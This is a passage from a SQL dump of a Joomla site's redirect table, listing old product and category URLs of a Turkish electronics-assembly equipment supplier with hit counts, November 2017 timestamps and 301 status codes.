00:00:00',301),(10492,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,ordering',NULL,'','',540,0,'2017-11-09 09:04:35','0000-00-00 00:00:00',301),(10493,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',542,0,'2017-11-09 09:04:38','0000-00-00 00:00:00',301),(10494,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',545,0,'2017-11-09 09:04:40','0000-00-00 00:00:00',301),(10495,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_sku',NULL,'','',546,0,'2017-11-09 09:04:45','0000-00-00 00:00:00',301),(10496,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı',NULL,'','',555,0,'2017-11-09 09:04:52','0000-00-00 00:00:00',301),(10497,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',553,0,'2017-11-09 09:04:53','0000-00-00 00:00:00',301),(10498,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',549,0,'2017-11-09 09:04:55','0000-00-00 00:00:00',301),(10499,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',549,0,'2017-11-09 09:05:00','0000-00-00 00:00:00',301),(10500,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',545,0,'2017-11-09 09:05:07','0000-00-00 00:00:00',301),(10501,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',545,0,'2017-11-09 09:05:09','0000-00-00 00:00:00',301),(10502,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',553,0,'2017-11-09 09:05:14','0000-00-00 00:00:00',301),(10503,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',551,0,'2017-11-09 09:05:17','0000-00-00 00:00:00',301),(10504,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',548,0,'2017-11-09 09:05:22','0000-00-00 00:00:00',301),(10505,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',550,0,'2017-11-09 09:05:25','0000-00-00 00:00:00',301),(10506,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-ultra-hız',NULL,'','',538,0,'2017-11-09 09:05:30','0000-00-00 00:00:00',301),(10507,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',553,0,'2017-11-09 09:05:32','0000-00-00 00:00:00',301),(10508,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',555,0,'2017-11-09 09:05:33','0000-00-00 00:00:00',301),(10509,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',552,0,'2017-11-09 09:05:38','0000-00-00 00:00:00',301),(10510,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',555,0,'2017-11-09 09:05:45','0000-00-00 00:00:00',301),(10511,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',545,0,'2017-11-09 09:05:48','0000-00-00 00:00:00',301),(10512,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',547,0,'2017-11-09 09:05:50','0000-00-00 00:00:00',301),(10513,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',537,0,'2017-11-09 09:05:55','0000-00-00 00:00:00',301),(10514,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',540,0,'2017-11-09 09:05:58','0000-00-00 00:00:00',301),(10515,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',542,0,'2017-11-09 09:06:05','0000-00-00 00:00:00',301),(10516,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',549,0,'2017-11-09 09:06:06','0000-00-00 00:00:00',301),(10517,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',551,0,'2017-11-09 09:06:11','0000-00-00 00:00:00',301),(10518,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',539,0,'2017-11-09 09:06:16','0000-00-00 00:00:00',301),(10519,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',537,0,'2017-11-09 09:06:18','0000-00-00 00:00:00',301),(10520,'http://3s-technologies.com.tr/index.php/en/products/ly-8c-detail?print=1&tmpl=component',NULL,'','',6,0,'2017-11-09 09:28:07','0000-00-00 00:00:00',301),(10521,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',549,0,'2017-11-09 09:49:23','0000-00-00 00:00:00',301),(10522,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-11-09 09:56:10','0000-00-00 00:00:00',301),(10523,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',1,0,'2017-11-09 10:11:39','0000-00-00 00:00:00',301),(10524,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/trident_full_view_150x150.jpg',NULL,'','',1,0,'2017-11-09 10:45:28','0000-00-00 00:00:00',301),(10525,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/rh6-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-09 10:52:18','0000-00-00 00:00:00',301),(10526,'http://www.3s-technologies.com.tr/en/products/thru-hole/jv131-detail/askquestion?tmpl=component',NULL,'','',30,0,'2017-11-09 11:30:51','0000-00-00 00:00:00',301),(10527,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-09 11:35:13','0000-00-00 00:00:00',301),(10528,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim',NULL,'','',15,0,'2017-11-09 11:45:54','0000-00-00 00:00:00',301),(10529,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/rh2-detail?tmpl=component&print=1',NULL,'','',6,0,'2017-11-09 11:46:15','0000-00-00 00:00:00',301),(10530,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/cm-602-l-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-09 11:50:27','0000-00-00 00:00:00',301),(10531,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/t_pb3_s_150x150.jpg',NULL,'','',1,0,'2017-11-09 11:56:25','0000-00-00 00:00:00',301),(10532,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/jvk_150x150.jpg',NULL,'','',1,0,'2017-11-09 11:58:32','0000-00-00 00:00:00',301),(10533,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-09 12:01:03','0000-00-00 00:00:00',301),(10534,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by?language=en-gb&product_sku',NULL,'','',3,0,'2017-11-09 12:03:43','0000-00-00 00:00:00',301),(10535,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/ly-8c-detail',NULL,'','',171,0,'2017-11-09 12:03:52','0000-00-00 00:00:00',301),(10536,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-09 12:04:05','0000-00-00 00:00:00',301),(10537,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by?`p`.product_sku&language=en-gb',NULL,'','',1,0,'2017-11-09 12:04:10','0000-00-00 00:00:00',301),(10538,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,product_name',NULL,'','',2,0,'2017-11-09 12:05:30','0000-00-00 00:00:00',301),(10539,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',1,0,'2017-11-09 12:05:35','0000-00-00 00:00:00',301),(10540,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name?language=en-gb',NULL,'','',16,0,'2017-11-09 12:06:20','0000-00-00 00:00:00',301),(10541,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/rhii_640x420_150x150.jpg',NULL,'','',1,0,'2017-11-09 12:07:20','0000-00-00 00:00:00',301),(10542,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/flux/by,product_name',NULL,'','',1,0,'2017-11-09 12:14:37','0000-00-00 00:00:00',301),(10543,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_name',NULL,'','',3,0,'2017-11-09 12:14:39','0000-00-00 00:00:00',301),(10544,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,product_sku',NULL,'','',1,0,'2017-11-09 12:14:54','0000-00-00 00:00:00',301),(10545,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/dirdesc',NULL,'','',7,0,'2017-11-09 12:14:59','0000-00-00 00:00:00',301),(10546,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_name',NULL,'','',2,0,'2017-11-09 12:15:01','0000-00-00 00:00:00',301),(10547,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/spr-20-41-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-09 12:15:07','0000-00-00 00:00:00',301),(10548,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/dirdesc',NULL,'','',3,0,'2017-11-09 12:16:02','0000-00-00 00:00:00',301),(10549,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/krem-lehim/by,category_name',NULL,'','',1,0,'2017-11-09 12:19:41','0000-00-00 00:00:00',301),(10550,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/dirdesc',NULL,'','',3,0,'2017-11-09 12:32:08','0000-00-00 00:00:00',301),(10551,'https://www.3s-technologies.com.tr/index.php/en/products/le-40v-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-09 12:43:36','0000-00-00 00:00:00',301),(10552,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,product_name?language=en-gb',NULL,'','',1,0,'2017-11-09 12:50:09','0000-00-00 00:00:00',301),(10553,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/by,product_name',NULL,'','',42,0,'2017-11-09 12:53:43','0000-00-00 00:00:00',301),(10554,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-09 13:04:51','0000-00-00 00:00:00',301),(10555,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/logo-panasonic6_150x150.jpg',NULL,'','',1,0,'2017-11-09 13:09:36','0000-00-00 00:00:00',301),(10556,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-09 13:14:41','0000-00-00 00:00:00',301),(10557,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/mirae',NULL,'','',60,0,'2017-11-09 13:15:44','0000-00-00 00:00:00',301),(10558,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/dalga-lehim/by,category_name',NULL,'','',2,0,'2017-11-09 13:19:04','0000-00-00 00:00:00',301),(10559,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name',NULL,'','',4,0,'2017-11-09 13:20:31','0000-00-00 00:00:00',301),(10560,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/smd-ultra-hız',NULL,'','',1,0,'2017-11-09 13:20:49','0000-00-00 00:00:00',301),(10561,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/jvk-detail',NULL,'','',1,0,'2017-11-09 13:21:39','0000-00-00 00:00:00',301),(10562,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/dirdesc',NULL,'','',1,0,'2017-11-09 13:22:09','0000-00-00 00:00:00',301),(10563,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/avb-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-09 13:23:02','0000-00-00 00:00:00',301),(10564,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/by,product_sku',NULL,'','',4,0,'2017-11-09 13:23:19','0000-00-00 00:00:00',301),(10565,'http://3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by?language=en-gb&product_sku',NULL,'','',3,0,'2017-11-09 13:25:52','0000-00-00 00:00:00',301),(10566,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,mf_name',NULL,'','',1,0,'2017-11-09 13:38:18','0000-00-00 00:00:00',301),(10567,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,category_name',NULL,'','',2,0,'2017-11-09 13:39:13','0000-00-00 00:00:00',301),(10568,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-09 13:40:28','0000-00-00 00:00:00',301),(10569,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-09 13:46:11','0000-00-00 00:00:00',301),(10570,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/manufacturer/resized/logo-panasonic6_250x250.jpg',NULL,'','',2,0,'2017-11-09 14:01:22','0000-00-00 00:00:00',301),(10571,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı/cs40-detail',NULL,'','',279,0,'2017-11-09 14:03:09','0000-00-00 00:00:00',301),(10572,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/anasayfa',NULL,'','',8,0,'2017-11-09 14:03:43','0000-00-00 00:00:00',301),(10573,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-09 14:06:57','0000-00-00 00:00:00',301),(10574,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_all_150x150.png',NULL,'','',1,0,'2017-11-09 14:08:51','0000-00-00 00:00:00',301),(10575,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,category_name',NULL,'','',1,0,'2017-11-09 14:10:54','0000-00-00 00:00:00',301),(10576,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,category_name',NULL,'','',4,0,'2017-11-09 14:13:45','0000-00-00 00:00:00',301),(10577,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturers/aqueous',NULL,'','',12,0,'2017-11-09 14:14:37','0000-00-00 00:00:00',301),(10578,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by?language=en-gb&product_name/dirdesc',NULL,'','',1,0,'2017-11-09 14:17:02','0000-00-00 00:00:00',301),(10579,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/results,1-5',NULL,'','',5,0,'2017-11-09 14:18:58','0000-00-00 00:00:00',301),(10580,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,mf_name',NULL,'','',1,0,'2017-11-09 14:23:10','0000-00-00 00:00:00',301),(10581,'http://www.3s-technologies.com.tr/tr/urunler/mi-300-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-09 14:23:56','0000-00-00 00:00:00',301),(10582,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',206,0,'2017-11-09 14:38:16','0000-00-00 00:00:00',301),(10583,'https://www.3s-technologies.com.tr/index.php/en/products/e-bar-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-09 14:44:30','0000-00-00 00:00:00',301),(10584,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/index_01_150x150.jpg',NULL,'','',1,0,'2017-11-09 14:46:55','0000-00-00 00:00:00',301),(10585,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',521,0,'2017-11-09 15:20:47','0000-00-00 00:00:00',301),(10586,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-11-09 15:23:26','0000-00-00 00:00:00',301),(10587,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',60,0,'2017-11-09 15:25:07','0000-00-00 00:00:00',301),(10588,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/results,1-10',NULL,'','',3,0,'2017-11-09 15:29:56','0000-00-00 00:00:00',301),(10589,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,product_name',NULL,'','',4,0,'2017-11-09 15:43:08','0000-00-00 00:00:00',301),(10590,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/results,1-50',NULL,'','',3,0,'2017-11-09 15:45:06','0000-00-00 00:00:00',301),(10591,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/av132-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-09 15:45:14','0000-00-00 00:00:00',301),(10592,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/avb-detail',NULL,'','',37,0,'2017-11-09 15:45:31','0000-00-00 00:00:00',301),(10593,'https://www.3s-technologies.com.tr/index.php/en/products/zero-ion-g3-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-09 15:51:44','0000-00-00 00:00:00',301),(10594,'http://www.3s-technologies.com.tr/en/products/ls60v-detail?tmpl=component&print=1',NULL,'','',32,0,'2017-11-09 15:54:49','0000-00-00 00:00:00',301),(10595,'https://www.3s-technologies.com.tr/index.php/en/products/mi-300-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-09 16:17:42','0000-00-00 00:00:00',301),(10596,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/rh6-detail',NULL,'','',12,0,'2017-11-09 16:21:01','0000-00-00 00:00:00',301),(10597,'http://www.3s-technologies.com.tr/en/products/cm-602-l-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-09 16:26:23','0000-00-00 00:00:00',301),(10598,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-10',NULL,'','',17,0,'2017-11-09 16:41:37','0000-00-00 00:00:00',301),(10599,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail',NULL,'','',8,0,'2017-11-09 16:49:06','0000-00-00 00:00:00',301),(10600,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/npm_150x150.jpg',NULL,'','',1,0,'2017-11-09 16:53:05','0000-00-00 00:00:00',301),(10601,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-5',NULL,'','',1,0,'2017-11-09 16:56:37','0000-00-00 00:00:00',301),(10602,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',15,0,'2017-11-09 16:57:44','0000-00-00 00:00:00',301),(10603,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/sp-18p-l-detail',NULL,'','',45,0,'2017-11-09 17:17:00','0000-00-00 00:00:00',301),(10604,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',197,0,'2017-11-09 17:33:56','0000-00-00 00:00:00',301),(10605,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/dirdesc',NULL,'','',36,0,'2017-11-09 17:36:56','0000-00-00 00:00:00',301),(10606,'http://3s-technologies.com.tr/en/home2?format=feed&type=atom',NULL,'','',1,0,'2017-11-09 17:46:53','0000-00-00 00:00:00',301),(10607,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,ordering',NULL,'','',409,0,'2017-11-09 17:47:02','0000-00-00 00:00:00',301),(10608,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/dirdesc',NULL,'','',419,0,'2017-11-09 17:47:06','0000-00-00 00:00:00',301),(10609,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-50',NULL,'','',4,0,'2017-11-09 17:47:07','0000-00-00 00:00:00',301),(10610,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı?language=tr-tr',NULL,'','',1,0,'2017-11-09 17:47:07','0000-00-00 00:00:00',301),(10611,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın',NULL,'','',439,0,'2017-11-09 17:47:10','0000-00-00 00:00:00',301),(10612,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,`p`.product_sku',NULL,'','',414,0,'2017-11-09 17:47:12','0000-00-00 00:00:00',301),(10613,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',412,0,'2017-11-09 17:47:14','0000-00-00 00:00:00',301),(10614,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,category_name',NULL,'','',413,0,'2017-11-09 17:47:18','0000-00-00 00:00:00',301),(10615,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,category_name/dirdesc',NULL,'','',423,0,'2017-11-09 17:47:24','0000-00-00 00:00:00',301),(10616,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,mf_name',NULL,'','',414,0,'2017-11-09 17:47:28','0000-00-00 00:00:00',301),(10617,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,mf_name/dirdesc',NULL,'','',415,0,'2017-11-09 17:47:29','0000-00-00 00:00:00',301),(10618,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,ordering',NULL,'','',419,0,'2017-11-09 17:47:34','0000-00-00 00:00:00',301),(10619,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_name',NULL,'','',412,0,'2017-11-09 17:47:38','0000-00-00 00:00:00',301),(10620,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_name/dirdesc',NULL,'','',411,0,'2017-11-09 17:47:40','0000-00-00 00:00:00',301),(10621,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_sku',NULL,'','',411,0,'2017-11-09 17:47:46','0000-00-00 00:00:00',301),(10622,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/dirdesc',NULL,'','',418,0,'2017-11-09 17:47:50','0000-00-00 00:00:00',301),(10623,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',211,0,'2017-11-09 17:47:56','0000-00-00 00:00:00',301),(10624,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/ly-8c-detail',NULL,'','',212,0,'2017-11-09 17:47:57','0000-00-00 00:00:00',301),(10625,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/ly-8c-detail/askquestion?tmpl=component',NULL,'','',212,0,'2017-11-09 17:47:59','0000-00-00 00:00:00',301),(10626,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/am100-detail',NULL,'','',214,0,'2017-11-09 17:48:05','0000-00-00 00:00:00',301),(10627,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/am100-detail/askquestion?tmpl=component',NULL,'','',220,0,'2017-11-09 17:48:07','0000-00-00 00:00:00',301),(10628,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',425,0,'2017-11-09 17:48:09','0000-00-00 00:00:00',301),(10629,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',421,0,'2017-11-09 17:48:11','0000-00-00 00:00:00',301),(10630,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,category_name',NULL,'','',418,0,'2017-11-09 17:48:16','0000-00-00 00:00:00',301),(10631,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',421,0,'2017-11-09 17:48:18','0000-00-00 00:00:00',301),(10632,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,mf_name',NULL,'','',425,0,'2017-11-09 17:48:23','0000-00-00 00:00:00',301),(10633,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',417,0,'2017-11-09 17:48:25','0000-00-00 00:00:00',301),(10634,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,ordering',NULL,'','',423,0,'2017-11-09 17:48:30','0000-00-00 00:00:00',301),(10635,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_name',NULL,'','',424,0,'2017-11-09 17:48:34','0000-00-00 00:00:00',301),(10636,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',424,0,'2017-11-09 17:48:36','0000-00-00 00:00:00',301),(10637,'http://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',422,0,'2017-11-09 17:48:37','0000-00-00 00:00:00',301),(10638,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',361,0,'2017-11-09 17:48:39','0000-00-00 00:00:00',301),(10639,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',370,0,'2017-11-09 17:48:43','0000-00-00 00:00:00',301),(10640,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,mf_name',NULL,'','',379,0,'2017-11-09 17:48:45','0000-00-00 00:00:00',301),(10641,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',373,0,'2017-11-09 17:48:47','0000-00-00 00:00:00',301),(10642,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,ordering',NULL,'','',383,0,'2017-11-09 17:48:49','0000-00-00 00:00:00',301),(10643,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,pc.ordering,product_name',NULL,'','',376,0,'2017-11-09 17:48:51','0000-00-00 00:00:00',301),(10644,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,pc.ordering,product_name/dirdesc',NULL,'','',380,0,'2017-11-09 17:48:56','0000-00-00 00:00:00',301),(10645,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,product_name',NULL,'','',371,0,'2017-11-09 17:48:58','0000-00-00 00:00:00',301),(10646,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,product_name/dirdesc',NULL,'','',369,0,'2017-11-09 